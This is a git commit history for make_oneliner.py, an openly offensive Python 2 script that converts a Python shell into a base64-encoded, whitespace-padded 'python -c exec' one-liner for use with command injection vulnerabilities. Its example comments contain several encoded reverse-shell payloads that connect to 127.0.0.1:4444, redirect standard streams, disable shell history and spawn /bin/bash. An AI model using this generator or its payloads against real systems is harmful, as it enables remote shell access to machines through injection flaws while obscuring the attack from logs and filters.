ropnop · October 15, 2025 16:46 · Jul 12, 2017 · Jul 12, 2017 · Jul 12, 2017 · Jul 12, 2017
diff --git a/make_oneliner.py b/make_oneliner.py
@@ -8,7 +8,7 @@
 #
 # Example:
 #   $ python make_oneliner.py pty_shell.py
-#       python -c "exec('aW1wb3J0IG9zICAgOyAgICAgaW1wb3J0IHB0eSAgIDsgICAgIGltcG9ydCBzb2NrZXQgICA7ICAgICBsaG9zdCA9ICIxMjcuMC4wLjEiICAgOyAgICAgbHBvcnQgPSA0NDQ0ICAgOyAgICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAsICAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgIDsgICAgIHMuY29ubmVjdCgobGhvc3QgICAgICAsICAgICAgbHBvcnQpKSAgIDsgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICwgICAgIDApICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgLCAgICAgMSkgICA7ICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAsICAgICAyKSAgIDsgICAgIG9zLnB1dGVudigiSElTVEZJTEUiICAgICAgLCAgICAgJy9kZXYvbnVsbCcpICAgOyAgICAgcHR5LnNwYXduKCIvYmluL2Jhc2giKSAgIDsgICAgIHMuY2xvc2UoKSAgIDsgICAgIA=='.decode('base64'))"
+#       python -c "exec('aW1wb3J0IG9zICAgICAgICA7ICBpbXBvcnQgcHR5ICAgICAgICA7ICBpbXBvcnQgc29ja2V0ICAgICAgICA7ICBsaG9zdCA9ICIxMjcuMC4wLjEiICAgICAgICA7ICBscG9ydCA9IDQ0NDQgICAgICAgIDsgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICAgICAgICwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICBzLmNvbm5lY3QoKGxob3N0ICAgICAgICAgICwgICAgICBscG9ydCkpICAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICAgLCAgICAgMCkgICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgICAsICAgICAxKSAgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAgICwgICAgIDIpICAgICAgICA7ICBvcy5wdXRlbnYoIkhJU1RGSUxFIiAgICAgICAgICAsICAgICAnL2Rldi9udWxsJykgICAgICAgIDsgIHB0eS5zcGF3bigiL2Jpbi9iYXNoIikgICAgICAgIDsgIHMuY2xvc2UoKQ=='.decode('base64'))"
 #
 # Note: this really only works well on small, simple scripts with no tabs, methods, etc. YMMV
 
@@ -23,11 +23,10 @@ def randompadding():
 
 def getScript(infile):
     with open(infile, 'r') as fp:
-        script = fp.read()
-    return script
+        lines = [line.strip() for line in fp if line.strip()] #only read non-blank lines
+    return ";".join(lines) #join lines with a ;
 
 def makeOneLiner(script):
-    script = script.replace("\n",";") #replace newlines
     script = script.replace(",","{},{}".format(randompadding(),randompadding())) #add padding around commas
     script = script.replace(";","{};{}".format(randompadding(), randompadding())) #add padding around semicolons
     return script

diff --git a/make_oneliner.py b/make_oneliner.py
@@ -7,9 +7,10 @@
 #   Credit to Brendan Coles <bcoles[at]gmail.com>
 #
 # Example:
-# $ python make_oneliner.py pty_shell.py
-# python -c "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldAoKbGhvc3QgPSAiMTI3LjAuMC4xIgpscG9ydCA9IDQ0NDQKcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKcy5jb25uZWN0KChsaG9zdCwgbHBvcnQpKQpvcy5kdXAyKHMuZmlsZW5vKCksMCkKb3MuZHVwMihzLmZpbGVubygpLDEpCm9zLmR1cDIocy5maWxlbm8oKSwyKQpvcy5wdXRlbnYoIkhJU1RGSUxFIiwnL2Rldi9udWxsJykKcHR5LnNwYXduKCIvYmluL2Jhc2giKQpzLmNsb3NlKCkK'.decode('base64'))"
-
+#   $ python make_oneliner.py pty_shell.py
+#       python -c "exec('aW1wb3J0IG9zICAgOyAgICAgaW1wb3J0IHB0eSAgIDsgICAgIGltcG9ydCBzb2NrZXQgICA7ICAgICBsaG9zdCA9ICIxMjcuMC4wLjEiICAgOyAgICAgbHBvcnQgPSA0NDQ0ICAgOyAgICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAsICAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgIDsgICAgIHMuY29ubmVjdCgobGhvc3QgICAgICAsICAgICAgbHBvcnQpKSAgIDsgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICwgICAgIDApICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgLCAgICAgMSkgICA7ICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAsICAgICAyKSAgIDsgICAgIG9zLnB1dGVudigiSElTVEZJTEUiICAgICAgLCAgICAgJy9kZXYvbnVsbCcpICAgOyAgICAgcHR5LnNwYXduKCIvYmluL2Jhc2giKSAgIDsgICAgIHMuY2xvc2UoKSAgIDsgICAgIA=='.decode('base64'))"
+#
+# Note: this really only works well on small, simple scripts with no tabs, methods, etc. YMMV
 
 import sys
 from random import randint
@@ -26,9 +27,9 @@ def getScript(infile):
     return script
 
 def makeOneLiner(script):
-    oneliner = script.replace("\n",";") #replace newlines
-    oneliner = script.replace(",","{},{}".format(randompadding(),randompadding())) #add padding around commas
-    oneliner = script.replace(";","{};{}".format(randompadding(), randompadding())) #add padding around semicolons
+    script = script.replace("\n",";") #replace newlines
+    script = script.replace(",","{},{}".format(randompadding(),randompadding())) #add padding around commas
+    script = script.replace(";","{};{}".format(randompadding(), randompadding())) #add padding around semicolons
     return script
 
 if __name__ == '__main__':

diff --git a/make_oneliner.py b/make_oneliner.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python2
 
-# Author: ropnop
+# Author: @ropnop (Ronnie Flathers)
 # Simple script to ingest a Python file (e.g. a shell) and return a oneliner command
 # Useful with command injection vulns
 # Based entirely off of Metasploit's "reverse_python.rb" payload
@@ -9,6 +9,8 @@
 # Example:
 # $ python make_oneliner.py pty_shell.py
 # python -c "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldAoKbGhvc3QgPSAiMTI3LjAuMC4xIgpscG9ydCA9IDQ0NDQKcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKcy5jb25uZWN0KChsaG9zdCwgbHBvcnQpKQpvcy5kdXAyKHMuZmlsZW5vKCksMCkKb3MuZHVwMihzLmZpbGVubygpLDEpCm9zLmR1cDIocy5maWxlbm8oKSwyKQpvcy5wdXRlbnYoIkhJU1RGSUxFIiwnL2Rldi9udWxsJykKcHR5LnNwYXduKCIvYmluL2Jhc2giKQpzLmNsb3NlKCkK'.decode('base64'))"
+
+
 import sys
 from random import randint
 import base64

diff --git a/make_oneliner.py b/make_oneliner.py
@@ -5,7 +5,10 @@
 # Useful with command injection vulns
 # Based entirely off of Metasploit's "reverse_python.rb" payload
 #   Credit to Brendan Coles <bcoles[at]gmail.com>
-
+#
+# Example:
+# $ python make_oneliner.py pty_shell.py
+# python -c "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldAoKbGhvc3QgPSAiMTI3LjAuMC4xIgpscG9ydCA9IDQ0NDQKcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKcy5jb25uZWN0KChsaG9zdCwgbHBvcnQpKQpvcy5kdXAyKHMuZmlsZW5vKCksMCkKb3MuZHVwMihzLmZpbGVubygpLDEpCm9zLmR1cDIocy5maWxlbm8oKSwyKQpvcy5wdXRlbnYoIkhJU1RGSUxFIiwnL2Rldi9udWxsJykKcHR5LnNwYXduKCIvYmluL2Jhc2giKQpzLmNsb3NlKCkK'.decode('base64'))"
 import sys
 from random import randint
 import base64

diff --git a/make_oneliner.py b/make_oneliner.py
@@ -0,0 +1,37 @@
+#!/usr/bin/env python2
+
+# Author: ropnop
+# Simple script to ingest a Python file (e.g. a shell) and return a oneliner command
+# Useful with command injection vulns
+# Based entirely off of Metasploit's "reverse_python.rb" payload
+#   Credit to Brendan Coles <bcoles[at]gmail.com>
+
+import sys
+from random import randint
+import base64
+
+EXEC_COMMAND = "python -c \"exec('{}'.decode('base64'))\""
+
+def randompadding():
+    return " "*randint(1,10)
+
+def getScript(infile):
+    with open(infile, 'r') as fp:
+        script = fp.read()
+    return script
+
+def makeOneLiner(script):
+    oneliner = script.replace("\n",";") #replace newlines
+    oneliner = script.replace(",","{},{}".format(randompadding(),randompadding())) #add padding around commas
+    oneliner = script.replace(";","{};{}".format(randompadding(), randompadding())) #add padding around semicolons
+    return script
+
+if __name__ == '__main__':
+    if len(sys.argv) != 2:
+        print "Usage: {} <python file>".format(sys.argv[0])
+        sys.exit(1)
+
+    script = getScript(sys.argv[1])
+    oneliner = makeOneLiner(script)
+
+    print EXEC_COMMAND.format(base64.b64encode(oneliner))